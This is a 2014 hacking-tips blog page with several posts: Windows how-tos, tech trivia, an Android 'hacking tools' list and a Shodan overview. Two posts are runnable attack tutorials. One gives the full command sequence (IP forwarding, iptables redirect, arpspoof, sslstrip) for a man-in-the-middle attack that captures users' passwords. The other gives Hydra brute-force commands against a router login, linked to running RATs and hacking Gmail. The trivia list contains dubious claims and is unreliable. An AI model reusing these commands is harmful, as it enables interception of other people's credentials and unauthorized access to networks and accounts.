Tuesday, 13 May 2014

// // 1 comment

MOST USEFUL COMMANDS FOR WINDOWS COMMAND PROMPT !!


https://www.facebook.com/pages/Computer-Tricks-Tips/237543759740754


Hai guys today i am here, sharing a list of someuseful commands for windowS command prompt.


So first you need to open windows command prompt 

follow this steps :

1 : click on the start menu or click on the windows key on your keyboard.

2 : then you can see like this in that window "search programs and files" . now click on there and type "RUN"

3 : Now you will get some search results , and in the top area you can see a program which named "Run"

4 : click on that and then you will get a new window which named "RUN"

5 : After that you will get a window named run

DONE !!

AND ALSO HERE I AM GOING TO SHOW YOU A PICTURE OF 'HOW TO TYPE ON IT'

Like this :
https://www.facebook.com/pages/Computer-Tricks-Tips/237543759740754

 

Read More

Friday, 9 May 2014

// // Leave a Comment

SECURITY TIPS BY WORLD'S MOST WANTED HACKER KEVIN MITNICK





Security Tips By World's Most Wanted Hacker Kevin Mitnick


Read More

Tuesday, 6 May 2014

// // Leave a Comment

How To Use SSL Strip In KALI LINUX !!



HEY GUYS !! It's me https://www.facebook.com/AkhilnathBmw/ Today i am going to post about very useful tip and it is very simple. . .

How To Use SSL Strip In KALI LINUX !!


so let's start firstly i am going to tell you what is sslstrip -


sslstrip is a MITM attack tool that allows to attacker manipulates the traffic & capture data such as user name and password.

how it works for-

it works for converting https request into basic http request.

follow these steps

Step-1

for enabling ip forwarding so our computer can route traffic
echo 1 > /proc/sys/net/ipv4/ip_forward

Step-2

now we need configure ip table so that our computer can redirect traffic
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

Step-3

for start ARP spoof
arpspoof -i <interface> -t <target ip> -r <gateway ip>
Step-4
so now we need sslstrip in a new terminal(don't close previous terminal)
sslstrip -l 8080

Note-you can done arp spoofing by ettercap


done it !!

Read More

Monday, 5 May 2014

// // Leave a Comment

CRACKING YOUR ROUTER PASSWORD USING BACKTRACK 5 AND HYDRA

           



CRACKING YOUR ROUTER PASSWORD USING BACKTRACK 5 AND HYDRA

hey guys it's me : https://www.facebook.com/AkhilnathBmw/


In this post I would like to show you how to crack your router password using Backtrack and Hydra in case you've forgotten it (Or not) You'll need it to port forward your router if you want to use RATs. I will cover wordlist cracking and brute force attack.



► THINGS NEEDED:


→ Computer

→ Rounter Lan IP

→ Backtrack5 (Optional), You can boot it from live CD, USB or run it in VMware player or in Virtual Box which I prefer.

→ THC Hydra logon cracker,great tool for cracking passwords (for example you can hack Gmail account and more), preinstalled in Backtracl5. GET IT HERE: http://www.thc.org/thc-hydra/

→ Word list (Just google it, I have been using POLISH wordlist from here: http://bezpieka.org/polski-slownik-premi... -wordlist) or if you have got time, enough patience and a lot of computing power you can brute force this baby.

→ Login list (optional), If you don't know your login you have to use login list. Again you will find it using google, or you can create yours, Usually, the login to the router control panel is: ADMIN.


►LETS BEGIN:

1. Start Backtrack5 and open terminal (you can press Ctrl + Alt + T)

2. Now type: "hydra -h" and familiarize with options and read instructions how to use HYDRA

3. OK, let the fun begin, in your terminal type: "hydra -l admin" (if the login is NOT ADMIN, you have to type -L (large l) and then specify the path to the login list you want to use, like in this example "hydra -L /root/Dekstop/loginlist.txt") then: "-P /PATH_TO_PW_LIST"

in my case it will look like: "hydra -l admin -P /root/Dekstop/pw.txt"

If you want to Brute Force it without using a dictionary you will have to use different command. Instead of "-P/PATH_TO_PW_LIST" use "-x"min:max"charset

MIN in minimum number of characters in password

MAX is maximum numbers of chars in pw

CHARSET is when you specify the characters used in pw generation: Use:

a - for lowercare letters

A - for uppercase letters

1 - for numbers

and for special characters just type them in
example: "hydra -l admin -x:5:8:aA1" (password from 5 to 8 chars using lowercase and uppercase letters and numbers)

4. Now we will choose options we want to use.

Use "-V" to show each attemp
Use "-F" to exit when password is found
You can use additional options if you want

5.Now type in your router IP, mine is 192.168.0.1. If you dont know your router IP, you will have to type:

"dhclienteth0" and look under DHCPACK. Your router local IP will be shown there.
Type IP in your browser to check if correct, login windows should appear

6.Finally type in protocol we will be using, It will be: "http-get /" You can see complete command at the pictures below. Hit enter. The cracking will begin
When It is finished you will get your password listed in terminal


also follow our facebook page for more update : https://www.facebook.com/pages/Computer-Tricks-Tips/237543759740754


► I HOPE THIS TUTOTIAL AND POST WAS CLEAR FOR YOU AND HELPFUL, PLEASE GIVE YOUR FEEDBACK!


Read More

Saturday, 3 May 2014

// // 1 comment

THE TOP 10 ANDROID HACKING TOOLS




THE TOP 10 ANDROID HACKING TOOLS FOR HACKERS !!


Always low battery but still android rocks !! this is the android logic . . but major part of mobile users using the android platform !! So today i am going to post THE TOP 10 ANDROID HACKING TOOLS ..



FOLLOW ME...

► #ANDROID_HACKING_TOOLS:

►1.HACKCODE:
The hacker's Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

►2.ANDRORAT:
Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

►3.APKINSPECTOR:
APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualise compiled Android packages and their corresponding DEX code.

►4.DROIDBOX:
DroidBox is developed to offer dynamic analysis of Android applications.

►5.BURP SUITE:
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

►6.ZANTI:
zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

►7.DROID SHEEP:
DroidSheep can be easily used by anybody who has an Android device and only the provider of the webservice can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the webservice.

►8.DSPLOIT:
dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device.

►9.APPUSE: (Android Pentest Platform Unified Standalone Environment):
AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs.

►10.SHARK FOR ROOT:
Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.



GUYS it's me►https://www.facebook.com/AkhilnathBmw/ I HOPE THIS TUTOTIAL AND POST WAS CLEAR FOR YOU AND HELPFUL, PLEASE GIVE YOUR FEEDBACK


ALSO FOLLOW OUR FACEBOOK PAGE FOR MORE UPDATES ► https://www.facebook.com/pages/Computer-Tricks-Tips/237543759740754

Read More

Friday, 2 May 2014

// // Leave a Comment

How To Use Keyboard As A Mouse ???




 Keyboard As A Mouse !!


Hey guys im here ! So let's start ..

Today im going tell you how to use Keyboard As A Mouse ? (full control)
here is the way . follow these steps . .

1.Open Ease of Access Center by clicking the Start button Picture of the Start button, clicking Control Panel, clicking Ease of Access, and then clicking Ease of Access Center.

Click Make the mouse easier to use.

Under Control the mouse with the keyboard, select the Turn on Mouse Keys check box.

Up and to the left
7
Up
8
Up and to the right
9
Left
4
Right
6
Down and to the left
1
Down
2
Down and to the right
3

Select the left mouse button
The forward slash (/)
Select both buttons
The asterisk (*)
Select the right mouse button
The minus sign (-)

Click an item
With the left button selected as your active button, point to the item, and then press 5
Right-click an item
With the right button selected as your active button, point to the item, and then press 5
Double-click an item
With the left button selected as your active button, point to the item, and press the plus sign (+)

Drag an item
Point to the item, and then press zero (0)
Drop the item
Point to the location where you want to move the item, and then press the decimal point (.)

I Done It !!


follow our Facebook page for more awesome tricks :- https://www.facebook.com/pages/Computer-Tricks-Tips/237543759740754
Read More

Thursday, 1 May 2014

// // Leave a Comment

30 Interesting And Rarely Known Internet And Technology Facts

            30 Interesting And Rarely Known Internet And Technology Facts


NOW A DAYS TECHNOLOGY IS DEVELOPED IN TO A HUGE WAY SO IN THIS FAST LIFE WE CAN'T FOLLOW THROUGH THE UPDATES SO HERE AM GOING TO POST SOME RARELY INTERNET AND TECHNOLOGY FACTS.

1. Amazon, originally was a printed book seller company, now it sells more e-books than printed books.

2. The first banner advertisement on Website was introduced in the year 1994.

3. Facebook reports over 1 billion registered users. Were it a country, it would have had 3rd largest population in the World.

4. During 1980 s, an IBM computer was not considered to be 100% compatible if it could not run Microsoft Flight Simulator.

5. Did you know that Email was already around before the World Wide Web came?

6. Every month, domain names are being registered at a rate of more than two million!

7. At the end of year 2012, there were total approximately 17 billion devices (which includes computers, tablets and mobile) connected to the Internet.

8. About 1.8 billion people connect to the Internet, only 450 million of them speak English.

9. Did you know how was Bill Gates's house was designed? Using a Macintosh computer.

10. Microsoft Windows tutorial’s another name is ‘Crash Course’. Now we why !

11. The average 21 year old has spent 5,000 hours playing video games, has exchanged 250,000 e-mails, instant and text messages and has spent 10,000 hours on the mobile phone.

12. 70% of virus writers actually work under a contract for an organization.

13. Up until the 14th of September, 1995, domain registration was free.

14. Symbolics.com is the first and oldest registered domain name. It completed 28 years on 15th March, 2013.

15. Mosaic was the first popular web browser which was released in 1993.

16. Sweden has the highest percentage of internet users, they are 75%.

17. A program named “Rother J” was the first computer virus to come into sight “in the wild” — that is, outside the single computer or lab where it was created.

18. While it took the radio 38 years, and the television a short 13 years, it took the World Wide Web only 4 years to reach 50 million users.

19. There are approximately 1.06 billion instant messaging accounts worldwide.

20. Two-thirds of American Internet users shop online.

21. Every minute, 10 hours of videos are uploaded on YouTube.

22. The world’s first computer which was named the Z1, was invented by Konrad Zuse in 1936. His next invention, the Z2 was finished in 1939 and was the first fully functioning electro-mechanical computer.

23. Doug Engelbart had made the first computer mouse in 1964, and it was made out of wood.

24. The average computer user blinks 7 times a minute, less than half the normal rate of 20.

25. Google uses an estimated 15 billion kWh of electricity per year, more than most countries. However, Google generates a lot of their own power with their solar panels.

26. U.S. President Bill Clinton’s inauguration in January 1997 was the first to be webcast.

27. Tim Berners-Lee coined the phrase “World Wide Web” in 1990.

28. The first two video games copyrighted in the U.S. were Asteroids and Lunar Lander in 1980.

29. 220 million tons of old computers and other technological hardware are trashed in the United States each year.

30. Alien Robots used in famous Transformers movie series are so huge, that if all robot parts are laid out end to end, it would stretch from one side of California to the other, about 180 miles.


I DONE IT !!


And also follow our Facebook fan page for more updates. https://www.facebook.com/pages/Computer-Tricks-Tips/237543759740754

Read More
// // Leave a Comment

What Is Shodan? (Hackers search engine)





“The Scariest Search Engine” OR you can say it ''World Most Dangerous Search engine''

Shodan is a search engine that lets you find specific types of computers (routers, servers, etc.) in the internet using a variety of filters. Some have also described it as a search engine of service banners, which are meta-data the server sends back to the client.[1] This can be information about the server software, what options the service supports, a welcome message or anything else that the client can find out before interacting with the server.

Shodan collects data mostly on web servers at the moment (HTTP port 80), but there is also some data from FTP (21), SSH (22) Telnet (23), SNMP (161) and SIP (5060) services.[2]

It was launched in 2009 by computer programmer John Matherly, who, in 2003,[3] conceived the idea of searching devices linked to the Internet.[4] The name Shodan is a reference to SHODAN, a character from the System Shock video game series.[3]

"OTher Search Engine un'like Shodan" But we like it very much

What Can Shodan Show Us?

The Terrifying Search Engine That Finds Internet-Connected Cameras, Traffic Lights, Medical Devices, Baby Monitors And Power Plants
Since almost every new device now has a web interface (maybe even your refrigerator) to ease remote management, we can access innumerable web-enabled servers, network devices, home security systems, etc.

Shodan can find us webcams, traffic signals, video projectors, routers, home heating systems, and SCADA systems that, for instance, control nuclear power plants and electrical grids. If it has a web interface, Shodan can find it!

Although many of these systems communicate over port 80 using HTTP, many use telnet or other protocols over other ports. Keep that in mind when trying to connect to them.
users you can use google for every information of "shodan"

link to shodan search engine

http://www.shodanhq.com/


Read More